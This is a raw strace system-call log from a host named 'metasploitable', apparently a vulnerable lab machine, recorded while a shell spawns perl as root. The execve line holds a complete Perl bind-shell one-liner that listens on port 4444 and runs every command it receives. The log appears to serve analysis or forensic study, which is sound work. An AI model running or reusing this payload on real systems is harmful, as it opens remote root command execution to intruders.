10419 07:32:55.798876 open("/lib/tls/i686/cmov/libnss_files.so.2", O_RDONLY) = 1

10419 07:32:55.798890 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\340\30\0\0004\0\0\0\254\221\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\330\206\0\0\330\206\0\0\330\206\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\240\213\0\0\240\213\0\0\5\0\0\0\0\20\0\0\1\0\0\0\350\216\0\0\350\236\0\0\350\236\0\0\314\1\0\0\260\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\374\216\0\0\374\236\0\0\374\236\0\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\350\216\0\0\350\236\0\0\350\236\0\0\f\1\0\0\f\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0k\0\0\0.\0\0\0\20\0\0\0\t\0\0\0\"F\340\24\240\240\245\1\31\10\200\20\203\6\212\10\0\0\222@]\1(\nx\10 \"\220\200\20,\5\1\204\4)!\0224\0\24\0\31\0\0\2\2\210@\0\200@0\210\201@@\200\0B\0\6\300.\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0002\0\0\0003\0\0\0\0\0\0\0004\0\0\0\0\0\0\0005\0\0\0007\0\0\0008\0\0\0\0\0\0\0:\0\0\0\0\0\0\0;\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512

10419 07:32:55.798991 fstat64(1, {st_mode=S_IFREG|0644, st_size=38412, ...}) = 0

10419 07:32:55.799031 mmap2(NULL, 41624, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7dcf000

10419 07:32:55.799044 mmap2(0xb7dd8000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x8) = 0xb7dd8000

10419 07:32:55.799074 close(1)          = 0

10419 07:32:55.799095 munmap(0xb7f8a000, 29913) = 0

10419 07:32:55.799111 open("/etc/passwd", O_RDONLY|0x80000 /* O_??? */) = 1

10419 07:32:55.799125 fcntl64(1, F_GETFD) = 0x1 (flags FD_CLOEXEC)

10419 07:32:55.799137 _llseek(1, 0, [0], SEEK_CUR) = 0

10419 07:32:55.799149 fstat64(1, {st_mode=S_IFREG|0644, st_size=1624, ...}) = 0

10419 07:32:55.799165 mmap2(NULL, 1624, PROT_READ, MAP_SHARED, 1, 0) = 0xb7f91000

10419 07:32:55.799176 _llseek(1, 1624, [1624], SEEK_SET) = 0

10419 07:32:55.799191 munmap(0xb7f91000, 1624) = 0

10419 07:32:55.799200 close(1)          = 0

10419 07:32:55.799229 getpgrp()         = 3831

10419 07:32:55.799240 rt_sigaction(SIGCHLD, {0x807e540, [], 0}, {SIG_DFL}, 8) = 0

10419 07:32:55.799255 getrlimit(RLIMIT_NPROC, {rlim_cur=8191, rlim_max=8191}) = 0

10419 07:32:55.799271 brk(0x8101000)    = 0x8101000

10419 07:32:55.799302 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

10419 07:32:55.799317 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

10419 07:32:55.799332 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

10419 07:32:55.799369 brk(0x8102000)    = 0x8102000

10419 07:32:55.799403 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

10419 07:32:55.799422 stat64("/sbin/AB", 0xbfb39188) = -1 ENOENT (No such file or directory)

10419 07:32:55.799435 stat64("/bin/AB", 0xbfb39188) = -1 ENOENT (No such file or directory)

10419 07:32:55.799446 stat64("/usr/sbin/AB", 0xbfb39188) = -1 ENOENT (No such file or directory)

10419 07:32:55.799458 stat64("/usr/bin/AB", 0xbfb39188) = -1 ENOENT (No such file or directory)

10419 07:32:55.799490 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0

10419 07:32:55.799525 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7e056f8) = 10420

10420 07:32:55.799590 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

10420 07:32:55.799609 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0

10420 07:32:55.799622 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0

10420 07:32:55.799634 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0

10420 07:32:55.799650 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

10420 07:32:55.799666 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

10420 07:32:55.799679 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x807e540, [], 0}, 8) = 0

10420 07:32:55.799737 write(2, "sh: AB: command not found\n", 26) = -1 EPIPE (Broken pipe)

10420 07:32:55.799752 --- SIGPIPE (Broken pipe) @ 0 (0) ---

10420 07:32:55.799824 exit_group(127)   = ?

10419 07:32:55.817243 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

10419 07:32:55.817244 --- SIGCHLD (Child exited) @ 0 (0) ---

4519  07:32:55.817244 waitpid(10419,  <unfinished ...>

10419 07:32:55.817244 waitpid(-1, [{WIFEXITED(s) && WEXITSTATUS(s) == 127}], WNOHANG) = 10420

10419 07:32:55.837238 waitpid(-1, 0xbfb38e08, WNOHANG) = -1 ECHILD (No child processes)

10419 07:32:55.837238 sigreturn()       = ? (mask now [])

10419 07:32:55.837238 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

10419 07:32:55.837239 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

10419 07:32:55.837239 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

10419 07:32:55.837239 rt_sigaction(SIGINT, {0x807f150, [], 0}, {SIG_DFL}, 8) = 0

10419 07:32:55.837242 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

10419 07:32:55.837255 rt_sigaction(SIGINT, {SIG_DFL}, {0x807f150, [], 0}, 8) = 0

10419 07:32:55.837291 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

10419 07:32:55.837312 stat64("/sbin/perl", 0xbfb391b8) = -1 ENOENT (No such file or directory)

10419 07:32:55.837325 stat64("/bin/perl", 0xbfb391b8) = -1 ENOENT (No such file or directory)

10419 07:32:55.837337 stat64("/usr/sbin/perl", 0xbfb391b8) = -1 ENOENT (No such file or directory)

10419 07:32:55.837349 stat64("/usr/bin/perl", {st_mode=S_IFREG|0755, st_size=1080724, ...}) = 0

10419 07:32:55.837367 stat64("/usr/bin/perl", {st_mode=S_IFREG|0755, st_size=1080724, ...}) = 0

10419 07:32:55.837392 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0

10419 07:32:55.837407 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7e056f8) = 10421

10421 07:32:55.837461 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

10421 07:32:55.837479 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0

10421 07:32:55.837508 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0

10421 07:32:55.837522 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0

10421 07:32:55.837565 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

10421 07:32:55.837581 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

10421 07:32:55.837608 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x807e540, [], 0}, 8) = 0

10421 07:32:55.837646 execve("/usr/bin/perl", ["perl", "-MIO", "-e", "$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};"], [/* 14 vars */]) = 0

10421 07:32:55.837745 brk(0)            = 0x8153000

10421 07:32:55.837766 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10421 07:32:55.837782 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fc3000

10421 07:32:55.837798 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)

10421 07:32:55.837815 open("/etc/ld.so.cache", O_RDONLY) = 1

10421 07:32:55.837828 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

10421 07:32:55.837845 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7fbb000

10421 07:32:55.837855 close(1)          = 0

10421 07:32:55.837866 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10421 07:32:55.837888 open("/lib/tls/i686/cmov/libdl.so.2", O_RDONLY) = 1

10421 07:32:55.837902 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\n\0\0004\0\0\0L!\0\0\0\0\0\0004\0 \0\10\0(\0\35\0\34\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0003\33\0\0003\33\0\0003\33\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\34\0\0\374\34\0\0\5\0\0\0\0\20\0\0\1\0\0\0\264\36\0\0\264.\0\0\264.\0\0\230\1\0\0\310\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\320\36\0\0\320.\0\0\320.\0\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\264\36\0\0\264.\0\0\264.\0\0@\1\0\0@\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\26\0\0\0\31\0\0\0\4\0\0\0\7\0\0\0\230\0\21\0\0B\0\0\202\0`\10\223(\10\336\31\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0\0\0\0\0\33\0\0\0\34\0\0\0\0\0\0\0\36\0\0\0\0\0\0\0\0\0\0\0\37\0\0\0!\0\0\0\"\0\0\0\0\0\0\0\0\0\0\0#\0\0\0%\0\0\0&\0\0\0\0\0\0\0(\0\0\0\221!\374\370\225\263_\31\5\350\7\371\6\2\4\371\7\2\4\371\301S\200\30\256\304M\17a\242\222\6\325=l\366\327=l\366\370\31sB\353\26\251\30\373\31sB", 512) = 512

10421 07:32:55.838006 fstat64(1, {st_mode=S_IFREG|0644, st_size=9684, ...}) = 0

10421 07:32:55.838025 mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7fb7000

10421 07:32:55.838037 mmap2(0xb7fb9000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x1) = 0xb7fb9000

10421 07:32:55.838053 close(1)          = 0

10421 07:32:55.838065 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10421 07:32:55.838079 open("/lib/tls/i686/cmov/libm.so.6", O_RDONLY) = 1

10421 07:32:55.838093 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@4\0\0004\0\0\0PB\2\0\0\0\0\0004\0 \0\t\0(\0 \0\37\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0 \1\0\0 \1\0\0\5\0\0\0\4\0\0\0\3\0\0\0x\20\2\0x\20\2\0x\20\2\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0$/\2\0$/\2\0\5\0\0\0\0\20\0\0\1\0\0\0\334>\2\0\334>\2\0\334>\2\0`\1\0\0\244\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\360>\2\0\360>\2\0\360>\2\0\350\0\0\0\350\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0T\1\0\0T\1\0\0T\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0P\345td\214\20\2\0\214\20\2\0\214\20\2\0\34\4\0\0\34\4\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\334>\2\0\334>\2\0\334>\2\0\30\1\0\0\30\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\214\2\0\0\17\0\0\0@\0\0\0\v\0\0\0%\220 \305\t\204g\v\0\302\20 \4iER\202\20\200\240\0}\210\272\10\10I\0\0\0\0\0\33\4\201\0\0\0\232U\20A P \200\224\202\220\21@\3722\0\304a\24\0\10\6\306\220\232\f\207\300 \250\0  \202\0\230\201\4E\7\0054a\2\0\0\251C\30\310 \10\23\30\24M8\"\0\22\24\21@T\203\2E\1\1\1\244\fX\20\0\210\2\0 \0@\0$\214\5\10", 512) = 512

10421 07:32:55.838181 fstat64(1, {st_mode=S_IFREG|0644, st_size=149328, ...}) = 0

10421 07:32:55.838198 mmap2(NULL, 147584, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f92000

10421 07:32:55.838209 mmap2(0xb7fb5000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x23) = 0xb7fb5000

10421 07:32:55.838225 close(1)          = 0

10421 07:32:55.838236 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10421 07:32:55.838250 open("/lib/tls/i686/cmov/libpthread.so.0", O_RDONLY) = 1

10421 07:32:55.838264 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20H\0\0004\0\0\0\330C\1\0\0\0\0\0004\0 \0\t\0(\0$\0!\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0 \1\0\0 \1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\224\n\1\0\224\n\1\0\224\n\1\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\4;\1\0\4;\1\0\5\0\0\0\0\20\0\0\1\0\0\0\344=\1\0\344M\1\0\344M\1\0T\3\0\0\374#\0\0\6\0\0\0\0\20\0\0\2\0\0\0\324>\1\0\324N\1\0\324N\1\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0T\1\0\0T\1\0\0T\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0P\345td\250\n\1\0\250\n\1\0\250\n\1\0\314\4\0\0\314\4\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\344=\1\0\344M\1\0\344M\1\0\20\2\0\0\20\2\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\262\1\0\0L\0\0\0@\0\0\0\v\0\0\0\31!\2\221\1\n\20\"@H \331\3\0I4\200\0\0@\0 \200\200\21P`@@\22\213\0020D\0\0\20\0\0\2\0\1\r\0\204\n\360\1X\260\r\240\200\10 $\204\20B\242)m\10G\234V\20\0\224 \204$\10\0H(\1\222\34\301B\240\220\22\10\f \2\30`A\244c\4\0\n\32\3\0\0)\0(\314@\204\210L\22\10\241\0\4\0\10\0\300Q\0\2009\4C\300", 512) = 512

10421 07:32:55.838354 fstat64(1, {st_mode=S_IFREG|0755, st_size=112354, ...}) = 0

10421 07:32:55.838371 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f91000

10421 07:32:55.838383 mmap2(NULL, 94688, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f79000

10421 07:32:55.838394 mmap2(0xb7f8d000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x13) = 0xb7f8d000

10421 07:32:55.838409 mmap2(0xb7f8f000, 4576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7f8f000

10421 07:32:55.838422 close(1)          = 0

10421 07:32:55.838434 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10421 07:32:55.838447 open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 1

10421 07:32:55.838461 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260e\1\0004\0\0\0\4\307\24\0\0\0\0\0004\0 \0\n\0(\0D\0C\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0@\1\0\0@\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\2200\23\0\2200\23\0\2200\23\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\215\24\0(\215\24\0\5\0\0\0\0\20\0\0\1\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\260\'\0\0\204T\0\0\6\0\0\0\0\20\0\0\2\0\0\0\234\255\24\0\234\255\24\0\234\255\24\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0t\1\0\0t\1\0\0t\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0\7\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\10\0\0\0,\0\0\0\4\0\0\0\4\0\0\0P\345td\2440\23\0\2440\23\0\2440\23\0\354+\0\0\354+\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\354\221\24\0\354\221\24\0\354\221\24\0\10\36\0\0\10\36\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\363\3\0\0\n\0\0\0\0\2\0\0\16\0\0\0\2400\20D\200 \2\1\214\3\346\220AE\210\0\204\0\10\0A\200\0@\300\200\0\f\2\f\0\0010\0\10@\"\10\246\4\210H6l\240\0260\0&\204\200\216\4\10B$\2\f\246\244\32\6c\310\0\302 \1\300\0R\0!\201\10\4\n  \250\24\0\24(`\0\0P\240\312DB", 512) = 512

10421 07:32:55.838603 fstat64(1, {st_mode=S_IFREG|0755, st_size=1364388, ...}) = 0

10421 07:32:55.838622 mmap2(NULL, 1369712, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7e2a000

10421 07:32:55.838633 mmap2(0xb7f73000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x149) = 0xb7f73000

10421 07:32:55.838693 mmap2(0xb7f76000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7f76000

10421 07:32:55.838712 close(1)          = 0

10421 07:32:55.838724 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10421 07:32:55.838738 open("/lib/tls/i686/cmov/libcrypt.so.1", O_RDONLY) = 1

10421 07:32:55.838753 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0000\7\0\0004\0\0\0<\221\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\340\210\0\0\340\210\0\0\340\210\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\f\212\0\0\f\212\0\0\5\0\0\0\0\20\0\0\1\0\0\0\350\216\0\0\350\236\0\0\350\236\0\0`\1\0\0tr\2\0\6\0\0\0\0\20\0\0\2\0\0\0\374\216\0\0\374\236\0\0\374\236\0\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\350\216\0\0\350\236\0\0\350\236\0\0\f\1\0\0\f\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\17\0\0\0\22\0\0\0\2\0\0\0\6\0\0\0\4\311\240, \4\0\0\0\0\0\0\0\0\0\0\0\0\0\0\22\0\0\0\23\0\0\0\24\0\0\0\0\0\0\0\25\0\0\0\26\0\0\0\0\0\0\0\27\0\0\0\0\0\0\0\30\0\0\0\31\0\0\0\0\0\0\0k\31Qj\233(\375B\233`\205\33\327\16?\17I->\333\235C\r\375\313\373_\22\325=l\366\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0o\0\0\0\0\0\0\0\35\0\0\0\22\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0 \0\0\0\37\0\0\0\0\0\0\0", 512) = 512

10421 07:32:55.838846 fstat64(1, {st_mode=S_IFREG|0644, st_size=38300, ...}) = 0

10421 07:32:55.838863 mmap2(NULL, 201052, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7df8000

10421 07:32:55.838874 mmap2(0xb7e01000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x8) = 0xb7e01000

10421 07:32:55.838889 mmap2(0xb7e03000, 155996, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7e03000

10421 07:32:55.838903 close(1)          = 0

10421 07:32:55.838927 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7df7000

10421 07:32:55.838940 set_thread_area({entry_number:-1 -> 6, base_addr:0xb7df78c0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0

10421 07:32:55.839013 mprotect(0xb7f73000, 4096, PROT_READ) = 0

10421 07:32:55.839042 munmap(0xb7fbb000, 29913) = 0

10421 07:32:55.839055 set_tid_address(0xb7df7908) = 10421

10421 07:32:55.839064 set_robust_list(0xb7df7910, 0xc) = 0

10421 07:32:55.839074 futex(0xbfbee080, 0x81 /* FUTEX_??? */, 1) = 0

10421 07:32:55.839088 rt_sigaction(SIGRTMIN, {0xb7f7d2c0, [], SA_SIGINFO}, NULL, 8) = 0

10421 07:32:55.839101 rt_sigaction(SIGRT_1, {0xb7f7d340, [], SA_RESTART|SA_SIGINFO}, NULL, 8) = 0

10421 07:32:55.839113 rt_sigprocmask(SIG_UNBLOCK, [RTMIN RT_1], NULL, 8) = 0

10421 07:32:55.839127 getrlimit(RLIMIT_STACK, {rlim_cur=8192*1024, rlim_max=RLIM_INFINITY}) = 0

10421 07:32:55.839146 uname({sys="Linux", node="metasploitable", ...}) = 0

10421 07:32:55.839193 rt_sigaction(SIGFPE, {SIG_IGN}, {SIG_DFL}, 8) = 0

10421 07:32:55.839239 brk(0)            = 0x8153000

10421 07:32:55.839248 brk(0x8174000)    = 0x8174000

10421 07:32:55.839292 getuid32()        = 0

10421 07:32:55.839302 geteuid32()       = 0

10421 07:32:55.839311 getgid32()        = 0

10421 07:32:55.839320 getegid32()       = 0

10421 07:32:55.839362 mmap2(NULL, 135168, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7dd6000

10421 07:32:55.839387 open("/dev/urandom", O_RDONLY|O_LARGEFILE) = 1

10421 07:32:55.839403 read(1, "\262\365\345\202", 4) = 4

10421 07:32:55.839417 close(1)          = 0

10421 07:32:55.839435 time(NULL)        = 1495625575

10421 07:32:55.839475 stat64("/usr/local/lib/site_perl/5.8.8/i486-linux-gnu-thread-multi", 0xbfbedd50) = -1 ENOENT (No such file or directory)

10421 07:32:55.839507 stat64("/usr/local/lib/site_perl/5.8.8", 0xbfbedd50) = -1 ENOENT (No such file or directory)

10421 07:32:55.839548 stat64("/usr/local/lib/site_perl/i486-linux-gnu-thread-multi", 0xbfbedd50) = -1 ENOENT (No such file or directory)

10421 07:32:55.839578 stat64("/usr/local/lib/perl/5.8.7", 0xbfbede90) = -1 ENOENT (No such file or directory)

10421 07:32:55.839591 stat64("/usr/local/share/perl/5.8.7", 0xbfbede90) = -1 ENOENT (No such file or directory)

10421 07:32:55.839603 stat64("/usr/local/lib/perl/5.8.6", 0xbfbede90) = -1 ENOENT (No such file or directory)

10421 07:32:55.839615 stat64("/usr/local/share/perl/5.8.6", 0xbfbede90) = -1 ENOENT (No such file or directory)

10421 07:32:55.839627 stat64("/usr/local/lib/perl/5.8.4", 0xbfbede90) = -1 ENOENT (No such file or directory)

10421 07:32:55.839638 stat64("/usr/local/share/perl/5.8.4", 0xbfbede90) = -1 ENOENT (No such file or directory)

10421 07:32:55.839650 stat64("/usr/local/lib/perl/5.8.3", 0xbfbede90) = -1 ENOENT (No such file or directory)

10421 07:32:55.839662 stat64("/usr/local/share/perl/5.8.3", 0xbfbede90) = -1 ENOENT (No such file or directory)

10421 07:32:55.839673 stat64("/usr/local/lib/perl/5.8.2", 0xbfbede90) = -1 ENOENT (No such file or directory)

10421 07:32:55.839685 stat64("/usr/local/share/perl/5.8.2", 0xbfbede90) = -1 ENOENT (No such file or directory)

10421 07:32:55.839697 stat64("/usr/local/lib/perl/5.8.1", 0xbfbede90) = -1 ENOENT (No such file or directory)

10421 07:32:55.839708 stat64("/usr/local/share/perl/5.8.1", 0xbfbede90) = -1 ENOENT (No such file or directory)

10421 07:32:55.839724 stat64("/usr/local/lib/perl/5.8.0", 0xbfbede90) = -1 ENOENT (No such file or directory)

10421 07:32:55.839736 stat64("/usr/local/share/perl/5.8.0", 0xbfbede90) = -1 ENOENT (No such file or directory)

10421 07:32:55.839759 ioctl(0, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfbedb88) = -1 ENOTTY (Inappropriate ioctl for device)

10421 07:32:55.839772 _llseek(0, 0, [0], SEEK_CUR) = 0

10421 07:32:55.839785 ioctl(1, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfbedb88) = -1 EBADF (Bad file descriptor)

10421 07:32:55.839795 _llseek(1, 0, 0xbfbedbd0, SEEK_CUR) = -1 EBADF (Bad file descriptor)

10421 07:32:55.839806 ioctl(2, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfbedb88) = -1 EINVAL (Invalid argument)

10421 07:32:55.839817 _llseek(2, 0, 0xbfbedbd0, SEEK_CUR) = -1 ESPIPE (Illegal seek)

10421 07:32:55.839828 open("/dev/null", O_RDONLY|O_LARGEFILE) = 1

10421 07:32:55.839840 ioctl(1, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfbedc48) = -1 ENOTTY (Inappropriate ioctl for device)

10421 07:32:55.839851 _llseek(1, 0, [0], SEEK_CUR) = 0

10421 07:32:55.839862 fcntl64(1, F_SETFD, FD_CLOEXEC) = 0

10421 07:32:55.839874 fstat64(1, {st_mode=S_IFCHR|0666, st_rdev=makedev(1, 3), ...}) = 0

10421 07:32:55.839892 rt_sigaction(SIGCHLD, NULL, {SIG_DFL}, 8) = 0

10421 07:32:55.839945 readlink("/proc/self/exe", "/usr/bin/perl", 4095) = 13

10421 07:32:55.840001 getppid()         = 10419

10421 07:32:55.840065 stat64("/etc/perl/IO.pmc", 0xbfbed93c) = -1 ENOENT (No such file or directory)

10421 07:32:55.840079 stat64("/etc/perl/IO.pm", 0xbfbed84c) = -1 ENOENT (No such file or directory)

10421 07:32:55.840092 stat64("/usr/local/lib/perl/5.8.8/IO.pmc", 0xbfbed93c) = -1 ENOENT (No such file or directory)

10421 07:32:55.840105 stat64("/usr/local/lib/perl/5.8.8/IO.pm", 0xbfbed84c) = -1 ENOENT (No such file or directory)

